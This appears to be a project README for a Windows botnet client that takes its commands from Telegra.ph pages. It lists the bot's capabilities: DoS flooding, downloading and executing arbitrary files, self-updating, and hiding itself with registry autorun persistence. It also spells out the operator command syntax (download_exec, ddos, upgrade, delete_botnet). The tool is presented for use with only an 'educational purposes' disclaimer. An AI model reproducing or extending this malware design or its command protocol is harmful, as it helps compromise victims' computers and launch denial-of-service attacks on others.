An example botnet client which uses Telegra.ph as a C&C server.
- DoS attack feature.
- Loader & Executer of any files.
- Update feature.
- Program adds itself to autoload register and moves to hidden folder in C:/ drive root.
- Botnet deletion by command.
Notice, that this is not production ready version. There are many bugs which are waiting for a fix.
Example of a C&C server is located here.
Botnet uses the next syntax - command{split}value
or command{split}value{sep}value's_value
download_exec{split}LINK_TO_FILE
- download and run a file which is located atLINK_TO_FILE
.ddos{split}TARGET{sep}TIME
- ddos aTARGET
forTIME
seconds.upgrade{split}LINK_TO_FILE{sep}VERSION
- download and install an update which is located atLINK_TO_FILE
. Update will be installed only if botnet's file version is lower thanVERSION
.stop{split}
- you should use that command to stop the previous command execution.delete_botnet{split}
- delete the botnet and it's registry notes from the client's PC.exit{split}
- close botnet's executable file.
This program must be used for educational purposes only! Only you are responsible for anything you do with it!
This project is licensed under the MIT License - see the LICENSE.md file for details.